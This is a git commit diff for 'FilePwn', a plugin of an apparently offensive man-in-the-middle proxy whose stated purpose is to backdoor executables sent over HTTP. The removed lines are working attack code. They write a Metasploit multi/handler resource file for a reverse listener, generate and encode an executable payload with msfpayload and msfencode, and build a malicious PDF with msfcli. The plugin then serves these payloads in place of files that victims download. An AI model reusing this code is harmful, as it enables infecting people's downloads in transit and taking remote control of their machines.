the stupid

2025-07-06 21:12:16 -07:00 · 2014-07-12 08:00:10 +02:00 · 2014-07-12 08:00:10 +02:00 · b369f21bee
commit b369f21bee
parent f46bc49917
1 changed files with 2 additions and 52 deletions
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@ -8,7 +8,8 @@ class FilePwn(Plugin):
    implements = ["handleResponse"]
    has_opts = True
    log_level = logging.DEBUG
-    desc = "Backdoor files being sent over http unsing bdproxy"
+    desc = "Backdoor executables being sent over http using bdfproxy"
+    
    def initialize(self,options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
@ -18,58 +19,7 @@ class FilePwn(Plugin):
        self._make_files()
        if options.launch_msf_listener and options.msf_rc == "/tmp/tmp.rc":
            self._start_msf()
-    def _start_msf(self):
-        f = open("/tmp/tmp.rc","a")
-        f.write('''
-                use multi/handler
-                set PAYLOAD %s
-                set LHOST %s
-                set LPORT %s
-                set ExistOnSession false
-                exploit -j
-        ''' % (self.options.msf_file_payload,self.options.msf_lhost,
-            self.options.msf_file_lport))
-        f.close()
-        
-    def _make_files(self):
-        self.exe_made = False
-        if self.options.exe:
-            self._make_exe()
-        if self.options.pdf:
-            self._make_pdf()

-    def _make_exe(self):
-        if self.options.exe_file == None:
-            logging.info("Generating our executable...")
-            msfp = os.path.join(self.options.msf_path,"msfpayload") + " %s %s"
-            msfe = os.path.join(self.options.msf_path,"msfencode") + " %s"
-            payload = msfp%(self.options.msf_file_payload,self.msf_file_payload_opts)
-            encode = msfe % "-t exe -o /tmp/tmp.exe -e x86/shikata_ga_nai -c 8"
-            #print payload+" R |"+encode
-            os.system(payload+" R |"+encode)
-            self.exe_made = True
-            self.exe = "/tmp/tmp.exe"
-        else:
-            self.exe = self.options.exe_file
-        self.exe_payload = open(self.exe,"rb").read()
-        if self.options.exe:
-            for m in exe_mimetypes:
-                self.payloads[m] = self.exe_payload
-
-    def _make_pdf(self):
-        logging.info("Generating our PDF...")
-        if self.options.pdf_exploit.find("embedded_exe") != -1:
-            if not self.exe_made:
-                self._make_exe()
-            if self.msf_file_payload_opts.find("EXEFILE") == -1:
-                self.msf_file_payload_opts += " EXEFILE=" + self.exe
-        if self.msf_file_payload_opts.find("INFILENAME") == -1:
-            self.msf_file_payload_opts += " INFILENAME=" + \
-                                                  os.path.join(self.options.full_path,"data/blank.pdf")
-        self.msf_file_payload_opts += " FILENAME=/tmp/tmp.pdf"
-        msfc = os.path.join(self.options.msf_path,"msfcli") + " %s %s E"
-        os.system(msfc % (self.options.pdf_exploit,self.msf_file_payload_opts))
-        self.payloads['application/pdf'] = open("/tmp/tmp.pdf","rb").read()
    
    def handleResponse(self,request,data):
        #print "http://" + request.client.getRequestHostname() + request.uri